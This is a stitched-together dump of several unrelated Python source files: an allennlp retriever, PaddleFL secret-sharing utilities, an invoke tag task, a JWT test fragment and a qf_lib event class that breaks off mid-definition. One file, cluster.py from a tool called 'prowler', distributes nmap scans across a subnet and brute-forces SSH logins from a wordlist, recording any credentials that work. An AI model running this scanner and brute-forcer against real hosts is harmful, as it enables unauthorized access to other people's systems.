with open(os.path.join(_HERE, 'privkey.pem')) as f:
_KEY = f.read()
def create_token(data):
return jwt.encode(data, _KEY, algorithm='RS512')
_TOKEN = {'iss': 'runnerly',
'aud': 'runnerly.io'}
class TestViews(unittest.TestCase):
def setUp(self):
self.app = _TestApp(app)
self.token = create_token(_TOKEN).decode('ascii')
self.headers = {'Authorization': 'Bearer ' + self.token}
def test_one(self):
resp = self.app.get('/', headers=self.headers)
self.assertEqual(resp.status_code, 200)
|
examples_allennlp/utils/retrieval/retrievers/retriever.py
|
techthiyanes/luke
| 467 |
121357
|
<reponame>techthiyanes/luke
from typing import Tuple
import torch
from allennlp.common import Registrable
class Retriever(Registrable):
def _post_process_scores(self, scores: torch.Tensor):
raise NotImplementedError
def __call__(self, scores: torch.Tensor) -> Tuple[torch.LongTensor, torch.LongTensor]:
"""
Parameters
----------
scores: torch.Tensor (num_queries, num_targets)
"""
scores = self._post_process_scores(scores)
max_scores, indices = torch.max(scores, dim=1)
return max_scores, indices
|
cluster.py
|
Seabreg/prowler
| 103 |
121418
|
<filename>cluster.py
def compute(hostname):
import os
valid = "online"
breached = False
credentials = None
fingerprint = None
services = None
os_match = None
if (os.system("ping -c 1 -w 1 " + hostname)) == 0:
print("Host", hostname, "is online, starting nmap")
from libnmap.process import NmapProcess
from libnmap.parser import NmapParser
from libnmap.objects.os import NmapOSClass
nmproc = NmapProcess(targets=hostname, options="-O")
rc=nmproc.run()
parsed = NmapParser.parse(nmproc.stdout)
host = parsed.hosts[0]
#print("{0} {1}".format(host.address, " ".join(host.hostnames)))
os_match = []
if host.os_fingerprinted:
fingerprint = host.os.osmatches
print("OS Fingerprint:")
for osm in host.os.osmatches:
print("Found Match:{0} ({1}%)".format(osm.name, osm.accuracy))
for osc in osm.osclasses:
os_match.append(str(osc.description))
print("\tOS Class: {0}".format(osc.description))
else:
fingerprint = None
services = []
for serv in host.services:
services.append(str(serv.port) + "/" + str(serv.service))
print("Open ports:", services)
if serv.port == 22:
print("------starting credentials test------")
import paramiko, time
client = paramiko.client.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy)
uid_list, pwd_list=[], []
f = open('/home/pi/prowler/wordlists/wordlist_1.txt','r')
for row in f:
split = row.split(" ")
uid_list.append(split[0])
pwd_list.append(split[1])
for i, uid in enumerate(uid_list):
pwd = pwd_list[i]
try:
if breached == False:
#time.sleep(0.1) # for when SSH connection keeps dropping
try:
client.connect(hostname,username=uid,password=<PASSWORD>)
stdin, stdout, stderr = client.exec_command('ls -l')
print("[!] Successfully connected to host", hostname)
status = "Poor SSH Credentials"
breached = True
credentials = [<PASSWORD>, pwd]
client.close()
except paramiko.AuthenticationException:
client.close()
#print("Failed to pwn. Trying again...")
except Exception as e:
print("Failed to pwn, error:", e)
except Exception as e:
print("Failed to pwn, error:", e)
else:
valid = "offline"
return hostname, os_match, services, breached, valid
if __name__ == '__main__':
import dispy, time, pika
import logging
import dispy.httpd
print("[i][dispy] Initialising Cluster")
#workers = ['192.168.0.133','192.168.0.110'
workers = ['192.168.0.170','192.168.0.111',
'192.168.0.153','192.168.0.195']
cluster = dispy.JobCluster(compute, nodes=workers, ip_addr='192.168.0.142')
http_server = dispy.httpd.DispyHTTPServer(cluster)
jobs, test_range = [], []
for i in range(0, 1):
for j in range(0, 255):
test_range.append("192.168." + str(i) + "." + str(j))
print("[i] Testing " + str(len(test_range)) + " hostnames")
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='scan_results')
time.sleep(4) # make sure cluster is connected
cluster.print_status()
start = time.time()
for i, address in enumerate(test_range):
# schedule execution of 'compute' on a node (running 'dispynode.py') with a parameter
job = cluster.submit(address)
job.id = i # optionally associate an ID to job (if needed later)
jobs.append(job)
# cluster.wait() # waits for all scheduled jobs to finish
for job in jobs:
try:
result = job()
hostname, fingerprint, services, breached, valid = result # waits for job to finish and returns results
#result_security = str(hostname) + " is " + str(valid) + ". Breached: " str(breached) + " with credentials " + str(credentials)
#print(job.ip_addr,":",result_security)
#print(os_matches)
if valid == "online":
message = [hostname, fingerprint, services, breached]
print(message)
try:
channel.basic_publish(exchange='scan_results_exchange', routing_key='scan_results', body=str(message))
print("Message published")
except Exception as e:
print("[!] Message failed to publish:", str(e))
try:
print("Refreshing connection")
try:
connection.close()
except Exception as e:
print(e)
pass
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='scan_results')
except Exception as e:
print("Error restarting connection", str(e))
channel.basic_publish(exchange='scan_results_exchange', routing_key='scan_results', body=str(message))
print("Message published successfully (second time)")
# print('OS Description : {0}'.format(osclass['osfamily']) for osclass in nmap.Portscanner[job.ip_addr]['osclass'])
# other fields of 'job' that may be useful:
# print(job.stdout, job.stderr, job.exception, job.ip_addr, job.start_time, job.end_time)
else:
print(hostname, "is offline")
except Exception as e:
print("[!]",str(job),"failed with error:",str(e))
print("[+] Debug:", job.stdout, job.stderr, job.exception)
connection.close()
end = time.time()
print("\n","[i] Total time taken =", str(end - start))
cluster.print_status()
http_server.shutdown()
cluster.close()
|
python/paddle_fl/mpc/data_utils/data_utils.py
|
barrierye/PaddleFL
| 379 |
121466
|
<filename>python/paddle_fl/mpc/data_utils/data_utils.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provide data utilities for PrivC protocol, including
data encryption, decryption, share save and loading.
"""
import abc
import six
import os
import numpy as np
import six
import paddle
import paddle.fluid as fluid
import mpc_data_utils as mdu
from ..layers import __all__ as all_ops
from .op_extra_desc import add_extra_desc
# operators that should be skipped when encrypt and decrypt
op_to_skip = ['feed', 'fetch', 'scale', 'mpc_init']
# operators that are supported currently for model encryption and decryption
supported_mpc_ops = all_ops + ['fill_constant', 'sgd'] + op_to_skip
# variables that used as plain variables and need no encryption
plain_vars = ['learning_rate_0']
MPC_MODEL_NAME = "__model__.mpc"
MODEL_NAME = "__model__"
MODEL_SHARE_DIR = "model_share"
MPC_OP_PREFIX = "mpc_"
@six.add_metaclass(abc.ABCMeta)
class DataUtils(object):
"""
abstract class for data utils.
"""
def __init__(self):
self.SHARE_NUM = None
self.PRE_SHAPE = None
self.MPC_ONE_SHARE = None
def encrypt(self, number):
"""
Encrypts the plaintext number into secret shares
Args:
number: float, the number to share
Returns:
shares of input number
"""
pass
def decrypt(self, shares):
"""
Reveal plaintext value from raw secret shares
Args:
shares: shares to reveal from (list)
Return:
the plaintext number (float)
"""
pass
def make_shares(self, num_array):
"""
Create raw shares for an array.
Args:
num_array: the input data array
Returns:
shares of the num_array in type of ndarray
"""
old_size = num_array.size
flat_num_array = num_array.reshape(old_size,)
new_shape = (self.SHARE_NUM, ) + num_array.shape
result = np.empty((old_size, self.SHARE_NUM), dtype=np.int64)
for idx in six.moves.range(0, old_size):
result[idx] = self.encrypt(flat_num_array[idx])
result = result.transpose(1, 0)
result = result.reshape(new_shape)
return result
def get_shares(self, shares, index):
"""
Build mpc shares from raw shares according to index
Args:
shares: the input raw share array
index: index of the mpc share
Returns:
mpc shares array corresponding to index
"""
pass
def save_shares(self, share_reader, part_name):
"""
Combine raw shares to mpc shares, and persists to files. Each mpc share will be
put into the corresponding file, e.g., ${part_name}.part[0/1/2].
Args:
share_reader: iteratable function object returning a single array of raw shares
in shape of [2/3, ...] each time
part_name: file name
Returns:
files with names of ${part_name}.part[0/1/2]
"""
pass
def load_shares(self, part_name, id, shape, append_share_dim=True):
"""
Load mpc shares from file with name ${part_name}.part{id} in shape of ${shape}.
Args:
part_name and id: use to build the file name of ${part_name}.part{id}
shape: the shape of output array
Returns:
iteratable function object returing a share array with give shape each time
"""
if append_share_dim == True:
shape = self.PRE_SHAPE + shape
ext = ".part{}".format(id)
share_size = np.prod(shape) * 8 # size of int64 in bytes
def reader():
"""
internal reader
"""
with open(part_name + ext, 'rb') as part_file:
share = part_file.read(share_size)
while share:
yield np.frombuffer(share, dtype=np.int64).reshape(shape)
share = part_file.read(share_size)
return reader
def reconstruct(self, shares, type=np.float):
"""
Reconstruct plaintext from mpc shares
Args:
shares: all the mpc share arrays, where the share slices
are stored rowwise
type: expected type of final result
Returns:
plaintext array reconstructed from the mpc shares, with shape of (dims)
"""
pass
def batch(self, reader, batch_size, drop_last=False):
"""
A batch reader return a batch data meeting the shared data's shape.
E.g., a batch arrays with shape (3, 4) of batch_size will be transform to (batch_size, 3, 4).
Args: see paddle.batch method
Returns: the batched reader
"""
pass
def transpile(self, program=None):
"""
Transpile Paddle program into MPC program.
Args:
program: The plain Paddle model program, default to
default_main_program.
Returns: The MPC program.
"""
if program is None:
program = fluid.default_main_program()
place = fluid.CPUPlace()
if program.num_blocks > 1:
raise NotImplementedError(
"The number of blocks in current main program"
"is {}, which is not supported in this version."
.format(program.num_blocks()))
global_block = program.global_block()
g_scope = fluid.global_scope()
mpc_vars_names = _transpile_type_and_shape(block=global_block)
# encrypt tensor values for each variable in mpc_var_names
for mpc_var_name in mpc_vars_names:
if g_scope.find_var(mpc_var_name) is not None:
param = g_scope.find_var(mpc_var_name)
param_tensor = np.array(param.get_tensor())
mpc_var = global_block.var(mpc_var_name)
if mpc_var_name not in plain_vars:
param.get_tensor()._set_dims(mpc_var.shape)
# process initialized params that should be 0
set_tensor_value = np.array([param_tensor, param_tensor]).astype(np.int64)
param.get_tensor().set(set_tensor_value, place)
#else:
# param.get_tensor().set(np.array(param.get_tensor()).astype('float64'), place)
# trigger sync to replace old ops.
op_num = global_block.desc.op_size()
_ = global_block.desc.append_op()
global_block.desc._remove_op(op_num, op_num + 1)
return program
def _transpile_type_and_shape(self, block):
"""
Transpile dtype and shape of plain variables into MPC dtype and shape.
And transpile op type into MPC type.
Args:
block: The block in Paddle program.
Returns: A set of variable names to encrypt.
"""
mpc_vars_names = set()
# store variable name in mpc_vars_names, and encrypt dtype and shape
for var_name in block.vars:
var = block.var(var_name)
if var.name != "feed" and var.name != "fetch":
mpc_vars_names.add(var.name)
if var_name in plain_vars:
# var.desc.set_dtype(fluid.framework.convert_np_dtype_to_dtype_(np.float64))
continue
encrypted_var_shape = self.PRE_SHAPE + var.shape
var.desc.set_dtype(fluid.framework.convert_np_dtype_to_dtype_(np.int64))
var.desc.set_shape(encrypted_var_shape)
# encrypt op type, or other attrs if needed
for op in block.ops:
if _is_supported_op(op.type):
if op.type == 'fill_constant':
op._set_attr(name='shape', val=MPC_ONE_SHARE.shape)
# set default MPC value for fill_constant OP
op._set_attr(name='value', val=MPC_ONE_SHARE)
op._set_attr(name='dtype', val=3)
elif op.type in self.op_to_skip:
pass
else:
add_extra_desc(op, block)
op.desc.set_type(MPC_OP_PREFIX + op.type)
else:
raise NotImplementedError('Operator {} is unsupported.'
.format(op.type))
return mpc_vars_names
def encrypt_model(self, program, mpc_model_dir=None, model_filename=None):
"""
Encrypt model, and save encrypted model (i.e., MPC model shares) into
files for MPC training, updating, or inference.
Args:
program: The loaded program of paddle model.
mpc_model_dir: The directory that save MPC model shares.
model_filename: The name of MPC model file, default is __model__.mpc.
"""
place = fluid.CPUPlace()
exe = fluid.Executor(place)
# TODO(xukun): support more blocks. Tips: may just adding "for loop" for all blocks.
if program.num_blocks > 1:
raise NotImplementedError(
"The number of blocks in current main program"
"is {}, which is not supported in this version."
.format(program.num_blocks()))
global_block = program.global_block()
g_scope = fluid.global_scope()
mpc_vars_names = _transpile_type_and_shape(global_block)
# encrypt tensor values for each variable in mpc_var_names
for mpc_var_name in mpc_vars_names:
if g_scope.find_var(mpc_var_name) is not None:
param = g_scope.find_var(mpc_var_name)
param_tensor = np.array(param.get_tensor())
param_tensor_shares = self.make_shares(param_tensor)
mpc_var = global_block.var(mpc_var_name)
for idx in six.moves.range(self.SHARE_NUM):
if mpc_var_name not in plain_vars:
param.get_tensor()._set_dims(mpc_var.shape)
set_tensor_value = self.get_shares(param_tensor_shares, idx)
param.get_tensor().set(set_tensor_value, place)
#else:
# param.get_tensor().set(np.array(param.get_tensor()).astype('float64'), place)
param_share_dir = os.path.join(
mpc_model_dir, MODEL_SHARE_DIR + "_" + str(idx))
fluid.io.save_vars(
executor=exe,
dirname=param_share_dir,
vars=[mpc_var],
filename=mpc_var_name)
# trigger sync to replace old ops.
op_num = global_block.desc.op_size()
_ = global_block.desc.append_op()
global_block.desc._remove_op(op_num, op_num + 1)
# save mpc model file
model_basename = os.path.basename(
model_filename) if model_filename is not None else MPC_MODEL_NAME
for idx in six.moves.range(self.SHARE_NUM):
model_share_dir = os.path.join(mpc_model_dir,
MODEL_SHARE_DIR + "_" + str(idx))
if not os.path.exists(model_share_dir):
os.makedirs(model_share_dir)
model_name = os.path.join(model_share_dir, model_basename)
with open(model_name, "wb") as f:
f.write(program.desc.serialize_to_string())
def decrypt_model(self, mpc_model_dir, plain_model_path, mpc_model_filename=None, plain_model_filename=None):
"""
Reveal a paddle model. Load encrypted model (i.e., MPC model shares) from files and decrypt it
into paddle model.
Args:
mpc_model_dir: The directory of all model shares.
plain_model_path: The directory to save revealed paddle model.
mpc_model_filename: The name of encrypted model file.
plain_model_filename: The name of decrypted model file.
"""
share_dirs = []
for sub_dir in os.listdir(mpc_model_dir):
if not sub_dir.startswith("."):
share_dirs.append(os.path.join(mpc_model_dir, sub_dir))
place = fluid.CPUPlace()
exe = fluid.Executor(place=place)
mpc_model_basename = os.path.basename(
mpc_model_filename) if mpc_model_filename is not None else MPC_MODEL_NAME
[main_prog, _, _] = fluid.io.load_inference_model(
dirname=share_dirs[0], executor=exe, model_filename=mpc_model_basename)
if main_prog.num_blocks > 1:
raise NotImplementedError(
"The number of blocks in current main program"
"is {}, which is not supported in this version"
.format(main_prog.num_blocks()))
global_block = main_prog.global_block()
g_scope = fluid.global_scope()
# a set storing unique variables to decrypt
vars_set = set()
# store variable name in vars_set, and decrypt dtype and shape
for mpc_var_name in global_block.vars:
mpc_var = global_block.var(mpc_var_name)
if mpc_var.name != "feed" and mpc_var.name != "fetch":
vars_set.add(mpc_var.name)
if mpc_var_name in plain_vars:
# var.desc.set_dtype(fluid.framework.convert_np_dtype_to_dtype_(np.float64))
continue
else:
plain_var_shape = mpc_var.shape
mpc_var.desc.set_shape(plain_var_shape)
mpc_var.desc.set_dtype(fluid.framework.convert_np_dtype_to_dtype_(np.float32))
# remove init op
first_mpc_op = global_block.ops[0]
if first_mpc_op.type == 'mpc_init':
global_block._remove_op(0)
# decrypt op type, or other attrs if needed
for mpc_op in global_block.ops:
# rename ops
if str(mpc_op.type).startswith(MPC_OP_PREFIX):
new_type = str(mpc_op.type)[len(MPC_OP_PREFIX):]
mpc_op.desc.set_type(new_type)
elif mpc_op.type == 'fill_constant':
mpc_op._set_attr(name='shape', val=(1))
mpc_op._set_attr(name='value', val=1.0)
mpc_op._set_attr(name='dtype', val=5)
# decrypt tensor values for each variable in vars_set
for var_name in vars_set:
var = global_block.var(var_name)
if g_scope.find_var(var_name) is not None:
param = g_scope.find_var(var_name)
if var_name in plain_vars:
pass
else:
# reconstruct plaintext
param_tensor_shares = self._get_param_all_shares(
var_name, share_dirs, mpc_model_basename)
param_tensor = reconstruct(
param_tensor_shares, type=np.float32)
param.get_tensor()._set_dims(var.shape)
param.get_tensor().set(param_tensor, place)
fluid.io.save_vars(
executor=exe,
dirname=plain_model_path,
vars=[var],
filename=var_name)
# trigger sync to replace old ops
op_num = global_block.desc.op_size()
_ = global_block.desc.append_op()
global_block.desc._remove_op(op_num, op_num + 1)
# save plaintext model file.
model_basename = os.path.basename(
plain_model_filename) if plain_model_filename is not None else MODEL_NAME
if not os.path.exists(plain_model_path):
os.makedirs(plain_model_path)
model_name = os.path.join(plain_model_path, model_basename)
with open(model_name, "wb") as f:
f.write(main_prog.desc.serialize_to_string())
def _get_param_all_shares(self, param_name, share_dirs, model_file):
"""
Get all shares of one parameter from directories.
Args:
param_name: The name of parameter.
share_dirs: The directories which storing model shares.
model_file: The name of model file.
Returns:
ndarray. The loaded shares.
"""
exe = fluid.Executor(place=fluid.CPUPlace())
param_shares = []
for share_dir in share_dirs:
_ = fluid.io.load_inference_model(
dirname=share_dir, executor=exe, model_filename=model_file)
g_scope = fluid.global_scope()
param = g_scope.find_var(param_name)
param_tensor = np.array(param.get_tensor())
param_shares.append(param_tensor)
return np.array(param_shares, dtype=np.int64)
def _is_supported_op(self, op_name):
"""
Check if op is supported for encryption and decryption.
Args:
op_name: The name of op.
Returns:
True if supported.
"""
if op_name not in supported_mpc_ops:
if str(op_name).endswith('_grad'):
self._is_supported_op(str(op_name)[:-5])
else:
return False
return True
def load_mpc_model(self, exe, mpc_model_dir, mpc_model_filename, inference=False):
"""
Load MPC model from files. The loaded program of the model would be inserted
init OP and then switched to default_main_program for further MPC procedure.
Args:
exe: The executor used for loading.
mpc_model_dir: The directory of MPC model.
mpc_model_filename: The filename of MPC model.
inference: Whether the model to load is used for inference. If true, the
model to load should be an inference model, and feed_name, fetch_targets
would be returned with the loaded program after inserting init OP. Otherwise,
after inserting init OP, the loaded program would be switched to
default_main_program and returned. Default value is False.
Returns:
default_main_program if inference is False. Otherwise, default_main_program,
feed_name, and fetch_targets would be returned.
"""
mpc_program, feed_names, fetch_targets = fluid.io.load_inference_model(executor=exe,
dirname=mpc_model_dir,
model_filename=mpc_model_filename)
# find init OP
global_block = fluid.default_main_program().global_block()
init_op_idx = self._find_init_op_idx(global_block)
if init_op_idx < 0:
raise RuntimeError('No mpc_init op in global block, '
'maybe you should use paddle_fl.mpc.init() first.')
init_op = global_block.ops[init_op_idx]
# find the last feed OP for inserting init OP
last_feed_op_idx = self._find_last_feed_op_idx(mpc_program.global_block())
# insert init OP as the first OP of MPC program if no feed OP,
# otherwise, insert it after the last feed OP.
insert_idx = 0 if last_feed_op_idx < 0 else last_feed_op_idx + 1
loaded_mpc_program = self._insert_init_op(main_prog=mpc_program,
init_op=init_op,
index=insert_idx)
if inference:
return loaded_mpc_program, feed_names, fetch_targets
else:
# switch loaded_mpc_program to default_main_program
fluid.framework.switch_main_program(loaded_mpc_program)
return fluid.default_main_program()
def _find_init_op_idx(self, block):
"""
Find the index of mpc_init op.
Args:
block: The block of program.
Returns:
The index of mpc_init op.
"""
for idx, op in enumerate(block.ops):
if op.type == 'mpc_init':
return idx
return -1
def _find_last_feed_op_idx(self, block):
"""
Find the index of the last feed OP.
Args:
block: The block of program.
Returns:
The index of the last feed OP.
"""
feed_idx = -1
for idx, op in enumerate(block.ops):
if op.type == 'feed':
feed_idx = idx
return feed_idx
def save_trainable_model(self, exe, model_dir, model_filename=None, program=None):
"""
Save trainable model, which includes saving program and
persistable parameters into files. The saved model can be
loaded by fluid.io.load_inference_model for further training
or updating.
Args:
exe: The executor used for saving.
model_dir: The directory of model to save.
model_filename: The filename of model to save.
program: The program to save, default to default_main_program.
TODO: can move this to paddle_mpc/python/paddle_fl/mpc/io.py
"""
if not os.path.exists(model_dir):
os.makedirs(model_dir)
model_basename = os.path.basename(
model_filename) if model_filename is not None else MPC_MODEL_NAME
# save program
model_name = os.path.join(model_dir, model_basename)
if program is None:
program = fluid.default_main_program()
with open(model_name, "wb") as f:
f.write(program.desc.serialize_to_string())
# save parameters
fluid.io.save_persistables(executor=exe,
dirname=model_dir,
main_program=program)
def _insert_init_op(self, main_prog, init_op, index):
"""
Insert init OP into main_prog according to the index.
Args:
main_prog: The program to insert init OP.
init_op: The init OP for MPC running.
index: The place that the init_op to insert.
Returns:
The program after inserting init OP.
"""
main_prog.global_block()._sync_with_cpp()
op_desc = main_prog.global_block().desc._insert_op(index)
mpc_init_op = fluid.framework.Operator(block=main_prog.global_block(),
desc=op_desc,
type=init_op.type,
attrs=init_op.all_attrs())
main_prog.global_block().ops.insert(index, mpc_init_op)
return main_prog
class Aby3DataUtils(DataUtils):
"""
Aby3DataUtils
"""
def __init__(self):
"""
init
"""
self.SHARE_NUM = 3
self.PRE_SHAPE = (2, )
self.MPC_ONE_SHARE = mdu.aby3_one_share
def encrypt(self, number):
"""
Encrypts the plaintext number into three secret shares
Args:
number: float, the number to share
Returns:
three shares of input number
"""
try:
return mdu.aby3_share(number)
except Exception as e:
raise RuntimeError(e.message)
def decrypt(self, shares):
"""
Reveal plaintext value from raw secret shares
Args:
shares: shares to reveal from (list)
Return:
the plaintext number (float)
"""
try:
return mdu.aby3_reveal(shares)
except Exception as e:
raise RuntimeError(e.message)
def get_shares(self, shares, index):
"""
Build ABY3 shares from raw shares according to index
Args:
shares: the input raw share array, expected to have shape of [3, ...]
index: index of the ABY3 share, should be 0, 1, or 2
Returns:
ABY3 shares array corresponding to index, e.g.:
[shares[index % 3], shares[(index + 1) %3]]
Examples:
input_shares: [3, 2, 4], where 3 is the dim of raw shares
index: 0
output: [input_shares[0], input_shares[1]], shape = (2, 2, 4)
"""
if index < 0 or index >= self.SHARE_NUM:
raise ValueError("Index should fall in (0..2) but now: {}".format(
index))
if shares.size % self.SHARE_NUM != 0 or shares.shape[0] != self.SHARE_NUM:
raise ValueError("Shares to split has incorrect shape: {}".format(
shares.shape))
first = index % self.SHARE_NUM
second = (index + 1) % self.SHARE_NUM
return np.array([shares[first], shares[second]], dtype=np.int64)
def save_shares(self, share_reader, part_name):
"""
Combine raw shares to ABY3 shares, and persists to files. Each ABY3 share will be
put into the corresponding file, e.g., ${part_name}.part[0..2]. For example,
[share0, share1] -> ${part_name}.part0
[share1, share2] -> ${part_name}.part1
[share2, share0] -> ${part_name}.part2
Args:
share_reader: iteratable function object returning a single array of raw shares
in shape of [3, ...] each time
part_name: file name
Returns:
files with names of ${part_name}.part[0..2]
"""
exts = [".part0", ".part1", ".part2"]
with open(part_name + exts[0], 'wb') as file0, \
open(part_name + exts[1], 'wb') as file1, \
open(part_name + exts[2], 'wb') as file2:
files = [file0, file1, file2]
for shares in share_reader():
for idx in six.moves.range(0, 3): # 3 parts
share = self.get_shares(shares, idx)
files[idx].write(share.tostring())
def reconstruct(self, aby3_shares, type=np.float):
"""
Reconstruct plaintext from ABY3 shares
Args:
aby3_shares: all the three ABY3 share arrays, each is of shape (2, dims), where the share slices
are stored rowwise
type: expected type of final result
Returns:
plaintext array reconstructed from the three ABY3 shares, with shape of (dims)
Example:
aby3_shares: three ABY3 shares of shape [2, 2]
shares[0]: [[a0, b0], [a1, b1]]
shares[1]: [[a1, b1], [a2, b2]]
shares[2]: [[a2, b2], [a0, b0]]
output:
[a, b], where a = decrypt(a0, a1, a2), b = decrypt(b0, b1, b2)
"""
if len(aby3_shares) != self.SHARE_NUM: # should collect shares from 3 parts
raise ValueError("Number of aby3 shares should be 3 but was: {}".
format(len(aby3_shares)))
raw_shares = aby3_shares[:, 0]
data_shape = raw_shares.shape[1:] # get rid of the first dim of [3, xxx]
data_size = np.prod(data_shape)
row_first_raw_shares = raw_shares.reshape(self.SHARE_NUM, data_size).transpose(1, 0)
result = np.empty((data_size, ), dtype=type)
for idx in six.moves.range(0, data_size):
result[idx] = self.decrypt(row_first_raw_shares[idx].tolist())
return result.reshape(data_shape)
def batch(self, reader, batch_size, drop_last=False):
"""
A batch reader return a batch data meeting the shared data's shape.
E.g., a batch arrays with shape (2, 3, 4) of batch_size will be transform to (2, batch_size, 3, 4),
where the first dim 2 is the number of secret shares in ABY3.
Args: see paddle.batch method
Returns: the batched reader
"""
paddle_batch_reader = paddle.batch(reader, batch_size, drop_last)
def reshaped_batch_reader():
"""
internal reader
"""
r = paddle_batch_reader()
for instance in r:
perm = np.arange(0, len(np.array(instance).shape), 1)
# permute the first two axes
perm[0], perm[1] = perm[1], perm[0]
yield np.transpose(instance, perm)
return reshaped_batch_reader
class PrivcDataUtils(DataUtils):
"""
PrivcDataUtils
"""
def __init__(self):
"""
init
"""
self.SHARE_NUM = 2
self.PRE_SHAPE = ()
self.MPC_ONE_SHARE = mdu.privc_one_share
def encrypt(self, number):
"""
Encrypts the plaintext number into two secret shares
Args:
number: float, the number to share
Returns:
two shares of input number
"""
try:
return mdu.privc_share(number)
except Exception as e:
raise RuntimeError(e.message)
def decrypt(self, shares):
"""
Reveal plaintext value from raw secret shares
Args:
shares: shares to reveal from (list)
Return:
the plaintext number (float)
"""
try:
return mdu.privc_reveal(shares)
except Exception as e:
raise RuntimeError(e.message)
def get_shares(self, shares, index):
"""
Build share from raw shares according to index
Args:
shares: the input raw share array, expected to have shape of [SHARE_NUM, ...]
index: index of the privc share, should be 0 or 1
Returns:
share corresponding to index, e.g.: shares[index]
"""
if index < 0 or index >= self.SHARE_NUM:
raise ValueError("Index should fall in {0, {}} but now: {}".format(
self.SHARE_NUM, index))
if shares.size % self.SHARE_NUM != 0 or shares.shape[0] != self.SHARE_NUM:
raise ValueError("Shares to split has incorrect shape: {}".format(
shares.shape))
return np.array(shares[index], dtype=np.int64)
def save_shares(self, share_reader, part_name):
"""
Combine raw shares to privc shares, and persists to files. Each privc share will be
put into the corresponding file, e.g., ${part_name}.part[0..1]. For example,
share0 -> ${part_name}.part0
share1 -> ${part_name}.part1
Args:
share_reader: iteratable function object returning a single array of raw shares
in shape of [2, ...] each time
part_name: file name
Returns:
files with names of ${part_name}.part[0..1]
"""
exts = [".part0", ".part1"]
with open(part_name + exts[0], 'wb') as file0, \
open(part_name + exts[1], 'wb') as file1:
files = [file0, file1]
for shares in share_reader():
for idx in six.moves.range(0, 2):
share = self.get_shares(shares, idx)
files[idx].write(share.tostring())
def reconstruct(self, privc_shares, type=np.float):
"""
Reconstruct plaintext from privc shares
Args:
privc_shares: all the two privc share arrays, where the share slices
are stored rowwise
type: expected type of final result
Returns:
plaintext array reconstructed from the two privc shares, with shape of (dims)
Example:
privc_shares: two privc shares of shape [2]
shares[0]: [a0, b0]
shares[1]: [a1, b1]
output:
[a, b], where a = decrypt(a0, a1), b = decrypt(b0, b1)
"""
if len(privc_shares) != self.SHARE_NUM: # should collect shares from 2 parts
raise ValueError("Number of privc shares should be 2 but was: {}".
format(len(privc_shares)))
raw_shares = privc_shares
data_shape = raw_shares.shape[1:] # get rid of the first dim of [2, xxx]
data_size = np.prod(data_shape)
row_first_raw_shares = raw_shares.reshape(self.SHARE_NUM, data_size).transpose(1, 0)
result = np.empty((data_size, ), dtype=type)
for idx in six.moves.range(0, data_size):
result[idx] = self.decrypt(row_first_raw_shares[idx].tolist())
return result.reshape(data_shape)
def batch(self, reader, batch_size, drop_last=False):
"""
A batch reader return a batch data meeting the shared data's shape.
E.g., a batch arrays with shape (3, 4) of batch_size will be transform to (batch_size, 3, 4).
Args: see paddle.batch method
Returns: the batched reader
"""
paddle_batch_reader = paddle.batch(reader, batch_size, drop_last)
def reshaped_batch_reader():
"""
internal reader
"""
r = paddle_batch_reader()
for instance in r:
yield np.array(instance)
return reshaped_batch_reader
data_utils_list = {
'aby3': Aby3DataUtils(),
'privc': PrivcDataUtils()}
def get_datautils(protocol_name):
return data_utils_list[protocol_name]
|
tasks.py
|
gohar94/nums
| 111 |
121471
|
"""Command-line tools to facilitate the development of NumS."""
from invoke import task
from nums.core.version import __version__
@task
def tag(c):
"""Tag the current version of NumS and push the tag upstream."""
result = c.run("git tag", hide=True)
versions = result.stdout.splitlines()
current_version = "v" + __version__
if current_version in versions:
if not accepts(f"{current_version} is already tagged. Force update?"):
return
c.run(f"git tag {current_version} -f")
c.run("git push --tags -f")
else:
if not accepts(f"Tag {current_version} and push upstream?"):
return
c.run(f"git tag {current_version}")
c.run("git push --tags")
def accepts(message: str) -> bool:
"""Ask the user to respond 'y' or 'n' to the specified prompt.
If the user supplies an invalid response (i.e., neither 'y' or 'n'), then
the user is re-asked the question.
Args:
message: The question to ask the user.
Returns:
True if the user responds 'y' and false if the user responds 'n'.
"""
response = None
while response not in {"y", "n"}:
print(f"{message} (y/n)", end=" ")
response = input()
assert response in {"y", "n"}
return response == "y"
|
qf_lib/backtesting/events/time_event/single_time_event/schedule_order_execution_event.py
|
webclinic017/qf-lib
| 198 |
121482
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import defaultdict
from datetime import datetime
from typing import Dict, List
from qf_lib.backtesting.events.time_event.single_time_event.single_time_event import SingleTimeEvent
from qf_lib.backtesting.execution_handler.simulated_executor import SimulatedExecutor
from qf_lib.backtesting.order.order import Order
class ScheduleOrderExecutionEvent(SingleTimeEvent):
_datetimes_to_data = defaultdict(lambda: defaultdict(list)) # type: Dict[datetime, Dict[SimulatedExecutor, List[Order]]]
@classmethod
def schedule_new_event(cls, date_time: datetime, executor_to_orders_dict: Dict[SimulatedExecutor, List[Order]]):
"""
Schedules new event by adding the (date_time, data) pair to the _datetimes_to_data dictionary.
It assumes data has the structure of a dictionary, which maps orders executor instance to orders, which need
to be executed.
Multiple events can be scheduled for the same time - the orders and order executors will be appended to
existing data.
"""
for order_executor in executor_to_orders_dict.keys():
cls._datetimes_to_data[date_time][order_executor].extend(executor_to_orders_dict[order_executor])
def notify(self, listener) -> None:
"""
Notifies the listener.
"""
listener.on_orders_accept(self)
@classmethod
